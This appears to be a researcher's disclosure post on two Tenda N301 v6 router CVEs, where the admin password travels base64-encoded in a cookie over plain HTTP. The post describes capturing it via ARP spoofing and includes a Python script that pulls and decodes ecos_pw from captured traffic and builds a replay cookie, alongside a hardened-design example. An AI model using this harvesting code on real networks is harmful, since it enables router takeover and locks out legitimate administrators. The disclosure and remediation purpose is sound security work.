Tenda N301 v6 (CVE-2023-29680, CVE-2023-29681)

Mateus Pantoja
Apr 30, 2023


This post describes two weak-code implementations in the Tenda N301 router from Tenda Technology, tested on firmware v12.02.01.61_multi and firmware v12.03.01.06_pt.

Description

A weak-encoding implementation is used in the Tenda N301v6 router when storing and transmitting the password used to authenticate to the device, and neither firmware offers a setting that enables HTTPS for the management interface.

Firmware: V12.03.01.06_pt (CVE-2023-29680)
Firmware: V12.02.01.61_multi (CVE-2023-29681)

The password is sent base64-encoded in the ecos_pw cookie: in the request header “Cookie: ecos_pw=” on firmware V12.03.01.06_pt, and in the response header “Set-Cookie: ecos_pw=” on firmware V12.02.01.61_multi. Because the management interface is plain HTTP, an attacker on the same LAN or WLAN can intercept communications with the router via ARP spoofing and read the ecos_pw value from the captured headers. Base64 is a reversible encoding, not encryption, so the captured value yields the password directly.

Test scenario

Once the password is captured, the attacker can log into the device, set a new password that locks out the legitimate administrator, and perform actions that disrupt the network for its users.

POC

Using ARP spoofing to place the attacking host between the victim and the router, the communication can be intercepted with Wireshark, and the credentials used when logging into the router can be recovered from the captured HTTP headers.

sending fake packets

Credential obtained after packet interception, Firmware: V12.03.01.06_en (CVE-2023-29680)

Credential obtained after packet interception, Firmware: V12.02.01.61_multi (CVE-2023-29681)

The credential is only base64-encoded, so it can be decoded and used to log into the router.
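The recovery step described above, as an added example that is not part of the original post or of the router firmware. It parses a captured HTTP message, pulls the ecos_pw value out of either the Cookie header (the V12.03.01.06_pt form) or the Set-Cookie header (the V12.02.01.61_multi form), base64-decodes it, and builds the cookie value needed to replay it. The sample messages, the 192.168.0.1 address, the /goform/getWanStatus path and the password “Tenda!2023” are constructed for this example and are not from the post.

```python
import base64
from typing import Iterator, List, Optional

# Constructed sample captures for this example (not traffic from the post).
# The password "Tenda!2023" is a made-up placeholder; its base64 form is
# VGVuZGEhMjAyMw==. One message is a client request carrying the
# "Cookie: ecos_pw=" form seen on V12.03.01.06_pt, the other a router
# response carrying the "Set-Cookie: ecos_pw=" form seen on V12.02.01.61_multi.
SAMPLE_REQUEST = (
    b"GET /goform/getWanStatus HTTP/1.1\r\n"
    b"Host: 192.168.0.1\r\n"
    b"Cookie: ecos_pw=VGVuZGEhMjAyMw==; lang=en\r\n"
    b"\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Set-Cookie: ecos_pw=VGVuZGEhMjAyMw==; path=/\r\n"
    b"\r\n"
    b"<html></html>"
)
SAMPLE_UNRELATED = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: 192.168.0.1\r\n"
    b"\r\n"
)


def _cookie_headers(message: bytes) -> Iterator[bytes]:
    """Yield the value of every Cookie / Set-Cookie header in one HTTP message."""
    head = message.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the request/status line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() in (b"cookie", b"set-cookie"):
            yield value.strip()


def extract_ecos_pw(message: bytes) -> Optional[str]:
    """Return the plaintext router password carried in ecos_pw, or None.

    Handles both header forms seen on the two firmwares. The value is only
    base64-encoded, so decoding it is the entire recovery step.
    """
    for header in _cookie_headers(message):
        for part in header.split(b";"):
            name, _, value = part.strip().partition(b"=")
            if name.strip().lower() == b"ecos_pw" and value.strip():
                try:
                    return base64.b64decode(value.strip(), validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    return None                 # present but not valid base64/UTF-8
    return None


def harvest_passwords(messages: List[bytes]) -> List[str]:
    """Unique passwords seen across a list of captured HTTP messages, in order."""
    seen: List[str] = []
    for msg in messages:
        pw = extract_ecos_pw(msg)
        if pw is not None and pw not in seen:
            seen.append(pw)
    return seen


def build_login_cookie(password: str) -> bytes:
    """Cookie value a client would send to replay the captured credential."""
    return b"ecos_pw=" + base64.b64encode(password.encode("utf-8"))


if __name__ == "__main__":
    print(harvest_passwords([SAMPLE_REQUEST, SAMPLE_RESPONSE, SAMPLE_UNRELATED]))
    print(build_login_cookie("Tenda!2023"))
```

In practice the messages would come from the Wireshark capture (for example exported TCP stream payloads); the parser deliberately scans both request and response headers so one pass covers either firmware.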

Below are the links to the videos showing exploitation on both firmware versions.

POC_TENDA_N301_V6_firmware:V12.03.01.06.pt
POC_TENDA_N301_V6_firmware-V12.02.01.61.multi

The PoC ends here. Below I make some observations.

These vulnerabilities were only possible because some important features that protect the home user were not implemented:

  • Possibility to switch from HTTP to HTTPS
  • Session management to avoid more than one admin connected at the same time
  • Use of a secure password hash instead of a reversible encoding
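The weak pattern observed on both firmwares beside a hardened form, as an added example that is not code from the original post or from Tenda. The weak functions reproduce the reversible ecos_pw cookie; the RouterAuth class is an illustrative server-side model (an assumption about how a router could do it, not Tenda's implementation) that covers the three missing features listed above: the password is verified against a salted PBKDF2 hash and never leaves the device after login, the cookie is a random session token flagged Secure and HttpOnly so a browser only sends it over HTTPS, and at most one admin session exists at a time. The password “Tenda!2023” and the PBKDF2 round count are placeholders chosen for the example.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Dict, Optional

PBKDF2_ROUNDS = 200_000   # assumption for the example; any modern work factor would do


# --- Weak form, matching what the post observes on both firmwares: the cookie
# carries the admin password itself, merely base64-encoded, so anyone who can
# read the HTTP traffic recovers it with one decode call.
def weak_issue_cookie(password: str) -> str:
    return "ecos_pw=" + base64.b64encode(password.encode("utf-8")).decode("ascii")


def weak_recover_password(cookie: str) -> str:
    """What a passive observer on the LAN does with the weak cookie."""
    return base64.b64decode(cookie.split("=", 1)[1]).decode("utf-8")


# --- Hardened form (illustrative model, not Tenda's code): the password is only
# ever compared against a salted hash, the cookie is an unguessable random
# session token, only one admin session exists at a time, and the cookie is
# marked Secure so a browser sends it over HTTPS only.
class RouterAuth:
    def __init__(self, admin_password: str) -> None:
        self._salt = secrets.token_bytes(16)
        self._verifier = self._derive(admin_password)
        self._sessions: Dict[str, str] = {}      # token -> user

    def _derive(self, password: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), self._salt, PBKDF2_ROUNDS)

    def login(self, password: str) -> Optional[str]:
        """Return a fresh session token on success, None on failure."""
        if not hmac.compare_digest(self._derive(password), self._verifier):
            return None
        self._sessions.clear()                  # a new login replaces any existing admin session
        token = secrets.token_urlsafe(32)
        self._sessions[token] = "admin"
        return token

    def set_cookie_header(self, token: str) -> str:
        """Header the device sends after login; no credential material inside."""
        return f"Set-Cookie: session={token}; Path=/; Secure; HttpOnly; SameSite=Strict"

    def authenticate(self, cookie_header_value: str) -> bool:
        """True if the Cookie header value carries a live session token."""
        for part in cookie_header_value.split(";"):
            name, _, value = part.strip().partition("=")
            if name.strip() == "session":
                candidate = value.strip().encode("utf-8")
                return any(hmac.compare_digest(candidate, t.encode("utf-8")) for t in self._sessions)
        return False

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)


if __name__ == "__main__":
    print(weak_recover_password(weak_issue_cookie("Tenda!2023")))   # password falls out directly
    auth = RouterAuth("Tenda!2023")
    token = auth.login("Tenda!2023")
    print(auth.set_cookie_header(token))                             # random token, not the password
```

Even with the hardened cookie, the login request itself still carries the password once, which is why the first item in the list, an HTTPS option, is the one that actually closes the interception path; the session token and the hash limit what an observer gains from any single exposure.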

Well, that’s it. This is my publication about CVEs, and I believe this little contribution is useful to the cybersecurity community o/

Thanks and keep hacking!!!!!!!


Hi, I'm just a student and professional in the security area trying to share some knowledge =D